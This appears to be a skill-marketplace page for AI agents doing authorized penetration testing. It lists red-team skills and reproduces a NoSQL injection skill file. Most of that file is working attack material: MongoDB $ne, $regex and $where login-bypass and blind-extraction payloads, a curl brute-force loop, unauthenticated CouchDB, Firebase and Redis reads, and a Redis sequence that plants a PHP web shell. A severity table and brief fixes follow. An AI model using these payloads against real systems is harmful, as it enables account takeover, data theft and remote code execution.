菜单
NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Drive Decepticon — an autonomous multi-agent red-team framework — over MCP to run authorized penetration tests and bug-bounty engagements end to end, then watch and steer them live from chat. Launch an engagement against a target, poll its transcript to narrate progress, send messages to refocus it, and pull findings as SARIF. Use when the user asks to run a pentest/red-team engagement, hunt a bug bounty, do recon, exploit/scan a host, web app, API, network, cloud, Active Directory, mobile app, or smart contract WITH Decepticon — or to check/resume a running engagement or report what Decepticon found. Triggers: run a decepticon engagement, pentest this with decepticon, bug bounty, recon this target, red team this, scan this host, resume the engagement, what did decepticon find, decepticon status. Do NOT use for ad-hoc local tool runs (running nmap/sqlmap/ffuf directly) when no Decepticon server is involved — this drives the Decepticon orchestrator, not raw tools.
IoT device security reconnaissance — firmware extraction, embedded analysis, protocol identification, default credential checking, vulnerability scanning, device fingerprinting.
Mobile application security reconnaissance — APK/IPA analysis, permission enumeration, certificate validation, hardcoded secret detection, insecure storage identification, network security analysis.
Wireless network security reconnaissance — WiFi analysis, Bluetooth assessment, RFID/NFC evaluation, signal capture, protocol analysis, encryption testing, rogue device detection.
Operational-tier finding template — minimal fields for sub-agent decision support. Heavyweight deliverable promotion lives in skills/decepticon/final-report.
Red team engagement lifecycle management — initiation, phase transitions, go/no-go gates, deconfliction, emergency procedures, completion.
| name | nosqli |
| description | NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction. |
| metadata | {"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"} |
NoSQL stores parse JSON / native objects. When user input becomes part of a query object (not just a value), control flows into the query.
// Vulnerable: db.users.findOne({user: req.body.user, pass: req.body.pass})
POST /login
{"user": {"$ne": null}, "pass": {"$ne": null}} // returns first user
{"user": "admin", "pass": {"$gt": ""}} // admin if pw exists
{"user": "admin", "pass": {"$regex": "^A"}} // blind char extraction
{"$where": "this.user == 'admin' && sleep(5000)"} // time-based
{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}
$where was deprecated in Mongo 4.4 — still appears in legacy.
# Burp Intruder w/ payload list
for char in {a..z}; do
curl -s -X POST $TARGET/login \
-d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
| grep -q "success" && echo "char: $char"
done
# Admin party (no auth required)
curl http://target:5984/_all_dbs
curl http://target:5984/_users/_all_docs
# Then read/modify any document
# Public-read databases (most common misconfig)
curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
# Returns entire DB if rules are "true"
# Unauth Redis (still common on internal nets, occasionally exposed)
redis-cli -h target -p 6379 INFO
# Module loading attack if running as root + module dir writable
redis-cli -h target FLUSHALL
redis-cli -h target SET dir /var/www/html
redis-cli -h target SET dbfilename shell.php
redis-cli -h target SET payload "<?php system($_GET['c']); ?>"
redis-cli -h target SAVE
nosqlmap.py)# Mongo auth bypass via curl
curl -s -X POST $TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
| jq
# If logged-in-as-admin → critical
| Bug | Severity |
|---|---|
Auth bypass via $ne | Critical 9.8 |
| Blind char extraction of all user data | Critical 9.0 |
$where JS injection → RCE-adjacent (mongo runs the JS) | Critical 9.8 |
| Public CouchDB / Firebase | Critical (depends on data sensitivity) |
| Unauth Redis on internal net | High 7-8 |
// Sanitize/typecheck before query
if (typeof req.body.user !== 'string') return res.status(400).send();
if (typeof req.body.pass !== 'string') return res.status(400).send();
// Or use parameterized queries / Mongo ODM (Mongoose schemas)
User.findOne({user: req.body.user}).select('+password');
// Disable $where globally
mongoose.set('strictQuery', true);
skills/_corpus/payloads/NoSQL Injection/skills/exploit/web/sqli.md